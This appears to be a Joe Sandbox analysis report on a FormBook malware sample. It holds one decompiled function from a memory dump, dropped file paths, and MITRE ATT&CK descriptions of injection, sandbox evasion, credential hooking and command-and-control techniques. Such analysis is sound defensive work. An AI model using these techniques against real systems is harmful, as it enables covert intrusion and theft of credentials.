C-Code - Quality: 25%

			E36ADDF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x36bdb370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E36B28F40( &_v60, 0, "true");
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push("true");
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L36AF2330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E36AF24D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x36bd91e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E36B24B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x36addf21
0x36addf29
0x36addf33
0x36addf3b
0x36addf40
0x36addf44
0x36addf46
0x36addf52
0x36addf56
0x36addf5b
0x36addf5e
0x36addf61
0x36addf65
0x36addf67
0x36ade058
0x36ade05a
0x36ade05d
0x00000000
0x36addf6d
0x36addf6d
0x36addf70
0x36b3d6ea
0x36b3d6f3
0x00000000
0x36b3d6ec
0x36b3d6ec
0x36b3d6ec
0x36addf76
0x36addf76
0x36addf78
0x36addf78
0x36addf79
0x36addf80
0x36ade019
0x36ade024
0x36ade02c
0x36ade032
0x36ade03b
0x36ade045
0x36ade04b
0x36ade04e
0x36ade04e
0x36addf8d
0x36addf91
0x36addf94
0x36addf99
0x36addfa0
0x36addfab
0x36addfb3
0x36addfb7
0x36addfbb
0x36addfbc
0x36addfc0
0x36addfc8
0x36addfc9
0x36addfca
0x36addfcd
0x36addfe0
0x36addfea
0x36addfea
0x36addfec
0x36addfec
0x36addf70
0x36addff2
0x36addff3
0x36addff4
0x36addfff

APIs

RtlDebugPrintTimes.NTDLL ref: 36ADDFE0

Strings

0, xrefs: 36ADDFAB
0, xrefs: 36ADDFC0

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 12e18adb7452ca26a9f6e03a0b6fea616d10e0666e05769fbb426116b7f5dc30
Instruction ID: 2cc1e9a04ed4e88e0e14ae047a9dcec138a81e282797c5111ca12782025323b6
Opcode Fuzzy Hash: 12e18adb7452ca26a9f6e03a0b6fea616d10e0666e05769fbb426116b7f5dc30
Instruction Fuzzy Hash: 164139B5A087019FD300CF28C954A5ABBE5BF8C354F144A6EF988DB240D771EA05CF96

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hi38VYWujz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen\pvscsi.cat

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Longtail.Ver

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\SourceCodePro-Light.otf

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Tinnes.The180

C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
hi38VYWujz.exe

Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Function 00404C3F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre